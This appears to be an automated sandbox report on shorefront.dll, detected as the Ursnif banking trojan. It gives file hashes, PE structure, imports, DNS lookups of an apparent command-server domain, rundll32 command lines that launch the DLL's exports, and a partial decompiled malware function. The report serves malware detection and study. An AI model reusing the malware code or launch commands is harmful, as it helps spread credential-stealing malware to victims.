SHA-512:	740F9AE6B38ECC70861E1D4B746238D970EA40EA84B17276897ABCBA19D90D93DFFFDEF811D5F0D053EACEBD4A0B400E2B70BB3BCC41539DA707E44DF4A89781
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF896FBAE33087E32E.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	13237
Entropy (8bit):	0.5972692611662705
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9loJ9lop9lWnxTV929:kBqoIysrG
MD5:	E96BA0BC747494236BC0429356C61A71
SHA1:	50C56F2FB54ACF0D56C65C1F92B43894B8247773
SHA-256:	0FCB065D36956D9134F1DEAFE195677B90F3143C534147A4E91FB53DBFE1A301
SHA-512:	139FF4AB662834360F7D752A01ED0D14308FC85E782DEF0D10CCFBF0C2999DC1EBE105B5B1938BD5A34709D2A55C812D43D79F7DD3F0276F575BB2DF07A67A40
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.166903919730553
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	shorefront.dll
File size:	393728
MD5:	b3526bc3c4a61f9f09ac31ee9a5fc8a5
SHA1:	d92ac3fa9cca4ed8273111f767e24d8f53896787
SHA256:	f4a464c2e5f14cd4c391a9b5ba60deca36ccaa6c1503a097eeb0c5070945d1fb
SHA512:	0583e811619ea1ce40c430436e91b8b216fc509e7c75ed7132fdccc9f52f1828f50dbca6cd4b973090962fe6e8b76e298b0fe43b56ea2485810d4dc52e033fdb
SSDEEP:	6144:hC5FUWwNmY036ua+71w5uJEr+AitTdyh+a6R+/ZQWdB:0FBwNuKu4umqAinyh+7+h1H
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....pS...........!.........$.......W..............................................K.....@.............................m..

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x1045798
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x1000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x53700FF7 [Mon May 12 00:04:07 2014 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	f97da13a5df33dbcb72f17527b1d6819

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007F6174C5A777h
call 00007F6174C64340h
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+08h]
call 00007F6174C5A77Ch
add esp, 0Ch
pop ebp
retn 000Ch
push 0000000Ch
push 0105B7D8h
call 00007F6174C602DEh
xor eax, eax
inc eax
mov esi, dword ptr [ebp+0Ch]
test esi, esi
jne 00007F6174C5A77Eh
cmp dword ptr [020691B4h], esi
je 00007F6174C5A85Ah
and dword ptr [ebp-04h], 00000000h
cmp esi, 01h
je 00007F6174C5A777h
cmp esi, 02h
jne 00007F6174C5A7A7h
mov ecx, dword ptr [010137A0h]
test ecx, ecx
je 00007F6174C5A77Eh
push dword ptr [ebp+10h]
push esi
push dword ptr [ebp+08h]
call ecx
mov dword ptr [ebp-1Ch], eax
test eax, eax
je 00007F6174C5A827h
push dword ptr [ebp+10h]
push esi
push dword ptr [ebp+08h]
call 00007F6174C5A586h
mov dword ptr [ebp-1Ch], eax
test eax, eax
je 00007F6174C5A810h
mov ebx, dword ptr [ebp+10h]
push ebx
push esi
push dword ptr [ebp+08h]
call 00007F6174C52768h
mov edi, eax
mov dword ptr [ebp-1Ch], edi
cmp esi, 01h
jne 00007F6174C5A79Ah
test edi, edi
jne 00007F6174C5A796h
push ebx
push eax
push dword ptr [ebp+08h]
call 00007F6174C52750h
push ebx
push edi
push dword ptr [ebp+08h]
call 00007F6174C5A54Ch
mov eax, dword ptr [010137A0h]
test eax, eax
je 00007F6174C5A779h
push ebx
push edi
push dword ptr [ebp+08h]
call eax

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x5bdf0	0x6d	.text
IMAGE_DIRECTORY_ENTRY_IMPORT	0x106c200	0x64	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x106d000	0x2334	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1080	0x38	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x18b68	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x106c000	0x200	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5ae5d	0x5b000	False	0.629630623283	data	6.14182941666	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x5c000	0x100f10c	0x1c00	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.idata	0x106c000	0xc34	0xe00	False	0.399832589286	data	5.23220949273	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x106d000	0x2334	0x2400	False	0.759331597222	data	6.62458632125	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
KERNEL32.dll	SetStdHandle, WriteConsoleW, ReadConsoleW, CreateFileW, SetSystemPowerState, CreateFileA, GetWindowsDirectoryA, GetCommandLineA, CreateSemaphoreA, FormatMessageA, GetLocalTime, GetSystemTimeAsFileTime, HeapWalk, HeapCompact, HeapFree, HeapAlloc, VirtualProtectEx, OutputDebugStringW, LoadLibraryExW, SetFilePointerEx, ReadFile, GetConsoleMode, GetConsoleCP, FlushFileBuffers, CloseHandle, HeapReAlloc, GetModuleFileNameW, WriteFile, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCurrentProcessId, QueryPerformanceCounter, GetModuleFileNameA, GetFileType, GetStdHandle, WideCharToMultiByte, MultiByteToWideChar, GetStringTypeW, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, EncodePointer, DecodePointer, GetLastError, RaiseException, RtlUnwind, GetCurrentThreadId, GetCPInfo, UnhandledExceptionFilter, SetUnhandledExceptionFilter, SetLastError, InitializeCriticalSectionAndSpinCount, Sleep, GetCurrentProcess, TerminateProcess, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetModuleHandleW, GetProcAddress, IsProcessorFeaturePresent, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, ExitProcess, GetModuleHandleExW, HeapSize, GetProcessHeap, IsDebuggerPresent, IsValidCodePage, GetACP, GetOEMCP
ole32.dll	OleUninitialize, OleInitialize, OleSetContainedObject
ADVAPI32.dll	AllocateAndInitializeSid, SetEntriesInAclA, StartServiceCtrlDispatcherW, SetServiceStatus, RegisterServiceCtrlHandlerA, QueryServiceStatus, OpenServiceA, OpenSCManagerA, DeleteService, RegSetValueExA, RegQueryValueExA, RegOpenKeyExA, RegOpenKeyA, RegEnumKeyA, RegDeleteKeyA, RegCreateKeyExA, RegCloseKey, LookupPrivilegeValueA, OpenProcessToken, OpenThreadToken, GetTokenInformation, FreeSid, InitializeSecurityDescriptor, SetSecurityDescriptorDacl
hlink.dll

Exports

Name	Ordinal	Address
Child	1	0x103dbb0
Forcearea	2	0x103dc60
Stationmeat	3	0x103d3d0

Network Behavior

Network Port Distribution

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 3, 2021 18:04:57.835787058 CEST	50579	53	192.168.2.4	8.8.8.8
Jun 3, 2021 18:04:57.877228022 CEST	53	50579	8.8.8.8	192.168.2.4
Jun 3, 2021 18:04:58.193685055 CEST	51703	53	192.168.2.4	8.8.8.8
Jun 3, 2021 18:04:58.194834948 CEST	65248	53	192.168.2.4	8.8.8.8
Jun 3, 2021 18:04:58.195405006 CEST	53723	53	192.168.2.4	8.8.8.8
Jun 3, 2021 18:04:58.235152006 CEST	53	51703	8.8.8.8	192.168.2.4
Jun 3, 2021 18:04:58.236143112 CEST	53	65248	8.8.8.8	192.168.2.4
Jun 3, 2021 18:04:58.236301899 CEST	53	53723	8.8.8.8	192.168.2.4
Jun 3, 2021 18:04:58.640815020 CEST	64646	53	192.168.2.4	8.8.8.8
Jun 3, 2021 18:04:58.690197945 CEST	53	64646	8.8.8.8	192.168.2.4
Jun 3, 2021 18:04:59.577861071 CEST	65298	53	192.168.2.4	8.8.8.8
Jun 3, 2021 18:04:59.626797915 CEST	53	65298	8.8.8.8	192.168.2.4
Jun 3, 2021 18:04:59.664598942 CEST	59123	53	192.168.2.4	8.8.8.8
Jun 3, 2021 18:04:59.737924099 CEST	53	59123	8.8.8.8	192.168.2.4
Jun 3, 2021 18:05:00.287354946 CEST	54531	53	192.168.2.4	8.8.8.8
Jun 3, 2021 18:05:00.341882944 CEST	53	54531	8.8.8.8	192.168.2.4
Jun 3, 2021 18:05:00.524528980 CEST	49714	53	192.168.2.4	8.8.8.8
Jun 3, 2021 18:05:00.574057102 CEST	53	49714	8.8.8.8	192.168.2.4
Jun 3, 2021 18:05:01.698822021 CEST	58028	53	192.168.2.4	8.8.8.8
Jun 3, 2021 18:05:01.747279882 CEST	53	58028	8.8.8.8	192.168.2.4
Jun 3, 2021 18:05:03.097371101 CEST	53097	53	192.168.2.4	8.8.8.8
Jun 3, 2021 18:05:03.139079094 CEST	53	53097	8.8.8.8	192.168.2.4
Jun 3, 2021 18:05:04.113044977 CEST	49257	53	192.168.2.4	8.8.8.8
Jun 3, 2021 18:05:04.161500931 CEST	53	49257	8.8.8.8	192.168.2.4
Jun 3, 2021 18:05:05.240236998 CEST	62389	53	192.168.2.4	8.8.8.8
Jun 3, 2021 18:05:05.283468008 CEST	53	62389	8.8.8.8	192.168.2.4
Jun 3, 2021 18:05:54.963553905 CEST	49910	53	192.168.2.4	8.8.8.8
Jun 3, 2021 18:05:55.027280092 CEST	53	49910	8.8.8.8	192.168.2.4
Jun 3, 2021 18:06:26.936666965 CEST	55854	53	192.168.2.4	8.8.8.8
Jun 3, 2021 18:06:26.978046894 CEST	53	55854	8.8.8.8	192.168.2.4
Jun 3, 2021 18:06:28.175432920 CEST	64549	53	192.168.2.4	8.8.8.8
Jun 3, 2021 18:06:28.218729019 CEST	53	64549	8.8.8.8	192.168.2.4
Jun 3, 2021 18:06:29.277987003 CEST	63153	53	192.168.2.4	8.8.8.8
Jun 3, 2021 18:06:29.328186989 CEST	53	63153	8.8.8.8	192.168.2.4
Jun 3, 2021 18:06:29.367486954 CEST	52991	53	192.168.2.4	8.8.8.8
Jun 3, 2021 18:06:29.416198969 CEST	53	52991	8.8.8.8	192.168.2.4
Jun 3, 2021 18:06:30.062048912 CEST	53700	53	192.168.2.4	8.8.8.8
Jun 3, 2021 18:06:30.127419949 CEST	53	53700	8.8.8.8	192.168.2.4
Jun 3, 2021 18:06:30.666662931 CEST	51726	53	192.168.2.4	8.8.8.8
Jun 3, 2021 18:06:30.715130091 CEST	53	51726	8.8.8.8	192.168.2.4
Jun 3, 2021 18:06:31.485276937 CEST	56794	53	192.168.2.4	8.8.8.8
Jun 3, 2021 18:06:31.534965038 CEST	53	56794	8.8.8.8	192.168.2.4
Jun 3, 2021 18:06:33.046251059 CEST	56534	53	192.168.2.4	8.8.8.8
Jun 3, 2021 18:06:33.096560955 CEST	53	56534	8.8.8.8	192.168.2.4
Jun 3, 2021 18:06:37.884838104 CEST	56627	53	192.168.2.4	8.8.8.8
Jun 3, 2021 18:06:37.934593916 CEST	53	56627	8.8.8.8	192.168.2.4
Jun 3, 2021 18:06:39.378293037 CEST	56621	53	192.168.2.4	8.8.8.8
Jun 3, 2021 18:06:39.420027018 CEST	53	56621	8.8.8.8	192.168.2.4
Jun 3, 2021 18:06:40.316010952 CEST	63116	53	192.168.2.4	8.8.8.8
Jun 3, 2021 18:06:40.365956068 CEST	53	63116	8.8.8.8	192.168.2.4
Jun 3, 2021 18:06:41.262558937 CEST	64078	53	192.168.2.4	8.8.8.8
Jun 3, 2021 18:06:41.314126015 CEST	53	64078	8.8.8.8	192.168.2.4
Jun 3, 2021 18:06:43.233447075 CEST	64801	53	192.168.2.4	8.8.8.8
Jun 3, 2021 18:06:43.282026052 CEST	53	64801	8.8.8.8	192.168.2.4
Jun 3, 2021 18:06:46.981379986 CEST	61721	53	192.168.2.4	8.8.8.8
Jun 3, 2021 18:06:47.032116890 CEST	53	61721	8.8.8.8	192.168.2.4
Jun 3, 2021 18:06:48.251032114 CEST	51255	53	192.168.2.4	8.8.8.8
Jun 3, 2021 18:06:48.301836967 CEST	53	51255	8.8.8.8	192.168.2.4
Jun 3, 2021 18:06:48.314477921 CEST	61522	53	192.168.2.4	8.8.8.8
Jun 3, 2021 18:06:48.377386093 CEST	53	61522	8.8.8.8	192.168.2.4
Jun 3, 2021 18:06:48.390541077 CEST	52337	53	192.168.2.4	8.8.8.8
Jun 3, 2021 18:06:48.439580917 CEST	53	52337	8.8.8.8	192.168.2.4
Jun 3, 2021 18:06:49.089580059 CEST	55046	53	192.168.2.4	8.8.8.8
Jun 3, 2021 18:06:49.138902903 CEST	53	55046	8.8.8.8	192.168.2.4
Jun 3, 2021 18:06:49.145909071 CEST	49612	53	192.168.2.4	8.8.8.8
Jun 3, 2021 18:06:49.194487095 CEST	53	49612	8.8.8.8	192.168.2.4
Jun 3, 2021 18:06:49.201268911 CEST	49285	53	192.168.2.4	8.8.8.8
Jun 3, 2021 18:06:49.252738953 CEST	53	49285	8.8.8.8	192.168.2.4
Jun 3, 2021 18:07:10.306181908 CEST	50601	53	192.168.2.4	8.8.8.8
Jun 3, 2021 18:07:10.375230074 CEST	53	50601	8.8.8.8	192.168.2.4
Jun 3, 2021 18:07:14.013451099 CEST	60875	53	192.168.2.4	8.8.8.8
Jun 3, 2021 18:07:14.063872099 CEST	53	60875	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jun 3, 2021 18:06:48.251032114 CEST	192.168.2.4	8.8.8.8	0xd976	Standard query (0)	app.buboleinov.com	A (IP address)	IN (0x0001)
Jun 3, 2021 18:06:48.314477921 CEST	192.168.2.4	8.8.8.8	0x65f0	Standard query (0)	app.buboleinov.com	A (IP address)	IN (0x0001)
Jun 3, 2021 18:06:48.390541077 CEST	192.168.2.4	8.8.8.8	0xf05a	Standard query (0)	app.buboleinov.com	A (IP address)	IN (0x0001)
Jun 3, 2021 18:06:49.089580059 CEST	192.168.2.4	8.8.8.8	0x72bc	Standard query (0)	app.buboleinov.com	A (IP address)	IN (0x0001)
Jun 3, 2021 18:06:49.145909071 CEST	192.168.2.4	8.8.8.8	0x2930	Standard query (0)	app.buboleinov.com	A (IP address)	IN (0x0001)
Jun 3, 2021 18:06:49.201268911 CEST	192.168.2.4	8.8.8.8	0xd559	Standard query (0)	app.buboleinov.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jun 3, 2021 18:06:29.328186989 CEST	8.8.8.8	192.168.2.4	0xbf1e	No error (0)	prda.aadg.msidentity.com	www.tm.a.prd.aadg.akadns.net		CNAME (Canonical name)	IN (0x0001)
Jun 3, 2021 18:06:48.301836967 CEST	8.8.8.8	192.168.2.4	0xd976	Name error (3)	app.buboleinov.com	none	none	A (IP address)	IN (0x0001)
Jun 3, 2021 18:06:48.377386093 CEST	8.8.8.8	192.168.2.4	0x65f0	Name error (3)	app.buboleinov.com	none	none	A (IP address)	IN (0x0001)
Jun 3, 2021 18:06:48.439580917 CEST	8.8.8.8	192.168.2.4	0xf05a	Name error (3)	app.buboleinov.com	none	none	A (IP address)	IN (0x0001)
Jun 3, 2021 18:06:49.138902903 CEST	8.8.8.8	192.168.2.4	0x72bc	Name error (3)	app.buboleinov.com	none	none	A (IP address)	IN (0x0001)
Jun 3, 2021 18:06:49.194487095 CEST	8.8.8.8	192.168.2.4	0x2930	Name error (3)	app.buboleinov.com	none	none	A (IP address)	IN (0x0001)
Jun 3, 2021 18:06:49.252738953 CEST	8.8.8.8	192.168.2.4	0xd559	Name error (3)	app.buboleinov.com	none	none	A (IP address)	IN (0x0001)

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 6604 Parent PID: 6040

General

Start time:	18:05:03
Start date:	03/06/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe 'C:\Users\user\Desktop\shorefront.dll'
Imagebase:	0x960000
File size:	116736 bytes
MD5 hash:	542795ADF7CC08EFCF675D65310596E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000003.827452979.0000000000530000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.874866712.0000000002FE8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.874909818.0000000002FE8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.874494648.0000000002FE8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.874791903.0000000002FE8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.874837013.0000000002FE8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.874942139.0000000002FE8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.874588381.0000000002FE8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.874885116.0000000002FE8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.917892757.0000000002FE8000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 6612 Parent PID: 6604

General

Start time:	18:05:04
Start date:	03/06/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\shorefront.dll',#1
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6628 Parent PID: 6604

General

Start time:	18:05:04
Start date:	03/06/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\shorefront.dll,Child
Imagebase:	0x200000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.797710729.0000000002220000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6640 Parent PID: 6612

General

Start time:	18:05:04
Start date:	03/06/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\shorefront.dll',#1
Imagebase:	0x200000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.876330514.00000000050E8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.876188239.00000000050E8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000002.919920945.00000000050E8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.876373518.00000000050E8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000003.794830642.00000000027F0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.876356161.00000000050E8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.876088782.00000000050E8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.876229416.00000000050E8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.876297207.00000000050E8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.876268229.00000000050E8000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6700 Parent PID: 6604

General

Start time:	18:05:08
Start date:	03/06/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\shorefront.dll,Forcearea
Imagebase:	0x200000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000005.00000003.813086420.0000000003210000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6720 Parent PID: 6604

General

Start time:	18:05:14
Start date:	03/06/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\shorefront.dll,Stationmeat
Imagebase:	0x200000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000006.00000003.821591213.00000000030E0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 816 Parent PID: 800

General

Start time:	18:06:45
Start date:	03/06/2021
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase:	0x7ff601e70000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 6476 Parent PID: 816

General

Start time:	18:06:46
Start date:	03/06/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:816 CREDAT:17410 /prefetch:2
Imagebase:	0x8a0000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 4136 Parent PID: 816

General

Start time:	18:06:47
Start date:	03/06/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:816 CREDAT:17414 /prefetch:2
Imagebase:	0x8a0000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 6604 Parent PID: 6040 loaddll32.exeCOMMON

Executed Functions

Function 00504E9C, Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 222
memoryfiletimeCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00504E9C(signed char* __eax, intOrPtr* _a4) {
				signed int _v12;
				void* _v16;
				CHAR* _v20;
				struct _FILETIME _v28;
				void* _v32;
				void* _v36;
				char* _v40;
				signed int _v44;
				long _v344;
				struct _WIN32_FIND_DATAA _v368;
				signed int _t72;
				void* _t74;
				signed int _t76;
				void* _t78;
				intOrPtr _t81;
				CHAR* _t83;
				void* _t85;
				signed char _t89;
				signed char _t91;
				intOrPtr _t93;
				void* _t96;
				long _t99;
				int _t101;
				signed int _t109;
				char* _t111;
				void* _t113;
				int _t119;
				char _t128;
				void* _t134;
				signed int _t136;
				char* _t139;
				signed int _t140;
				char* _t141;
				char* _t146;
				signed char* _t148;
				int _t151;
				void* _t152;
				void* _t153;
				void* _t154;
				void* _t165;

				_v12 = _v12 & 0x00000000;
				_t148 = __eax;
				_t72 =  *0x50a2cc; // 0x63699bc3
				_t74 = RtlAllocateHeap( *0x50a290, 0, _t72 ^ 0x63699ac7);
				_v20 = _t74;
				if(_t74 == 0) {
					L36:
					return _v12;
				}
				_t76 =  *0x50a2cc; // 0x63699bc3
				_t78 = RtlAllocateHeap( *0x50a290, 0, _t76 ^ 0x63699bce);
				_t146 = 0;
				_v36 = _t78;
				if(_t78 == 0) {
					L35:
					HeapFree( *0x50a290, _t146, _v20);
					goto L36;
				}
				_t136 =  *0x50a2cc; // 0x63699bc3
				memset(_t78, 0, _t136 ^ 0x63699bce);
				_t81 =  *0x50a2d0; // 0x2add5a8
				_t154 = _t153 + 0xc;
				_t5 = _t81 + 0x50b825; // 0x73797325
				_t83 = E00501000(_t5);
				_v20 = _t83;
				if(_t83 == 0) {
					L34:
					_t68 =  &_v36; // 0x502779
					HeapFree( *0x50a290, _t146,  *_t68);
					goto L35;
				}
				_t134 = 0xffffffffffffffff;
				_v28.dwLowDateTime = 0x63699bce;
				_v28.dwHighDateTime = 0x63699bce;
				_t85 = CreateFileA(_t83, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_v32 = _t85;
				if(_t85 != 0x63699bce) {
					GetFileTime(_t85,  &_v28, 0, 0);
					_v28.dwLowDateTime = _v28.dwLowDateTime + 0x2a69c000;
					asm("adc dword [ebp-0x14], 0xc9"); // executed
					FindCloseChangeNotification(_v32); // executed
				}
				 *(StrRChrA(_v20, _t146, 0x5c)) = 0;
				_t89 = 0x3c6ef35f +  *_t148 * 0x19660d;
				_t91 = 0x3c6ef35f + _t89 * 0x19660d;
				 *_t148 = _t91;
				_v32 = _t91 & 0x000000ff;
				_t93 =  *0x50a2d0; // 0x2add5a8
				_t16 = _t93 + 0x50b846; // 0x642e2a5c
				_v40 = _t146;
				_v44 = _t89 & 0x000000ff;
				__imp__(_v20, _t16);
				_t96 = FindFirstFileA(_v20,  &_v368); // executed
				_v16 = _t96;
				if(_t96 == _t134) {
					_t146 = 0;
					goto L34;
				}
				_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				while(_t99 > 0) {
					_t101 = FindNextFileA(_v16,  &_v368); // executed
					if(_t101 == 0) {
						FindClose(_v16);
						_v16 = FindFirstFileA(_v20,  &_v368);
